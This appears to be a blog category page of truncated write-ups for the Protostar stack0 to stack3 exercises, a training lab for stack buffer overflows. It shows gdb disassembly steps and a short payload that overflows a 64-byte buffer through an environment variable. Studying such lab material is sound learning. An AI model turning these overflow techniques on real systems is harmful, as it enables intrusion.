Category: Protostar

Protostar exploit exercises – stack3

In this exercise we have to set a memory area to the address of the win function, so that we can alter the execution flow. Let us first determine the address of the win function. $ gdb /opt/protostar/bin/stack3 (gdb) disassemble win The address of the first instruction of the function is 0x08048424. Remember that the architecture…


Protostar exploit exercises – stack2

In this exercise the passed buffer should be set as an environment variable. The solution: $ GREENIE=`python -c ‘print “A”*64 + “\x0a\x0d\x0a\x0d”‘` $ export GREENIE $ /opt/protostar/bin/stack2


Protostar exploit exercises – stack1

This exercise is very similar to the previous one, with two differences. First, the string should be passed as an argument. Second, the modified variable should be set to a certain value (0x61626364). The important point here is that the architecture is little endian. this means that if we pass four charaters, those bytes will…


Protostar exploit exercises – stack0

This is the link to the Protostar exercises. Let us load the stack0 into gdb, change into INTEL mode and disassemble the main function. $ gdb /opt/protostar/bin/stack0 (gdb) set disassembly-flavor intel (gdb) disassemble main Line 4 allocates space for the variables modified and buffer. In line 5 the variable modified is set to 0. The address…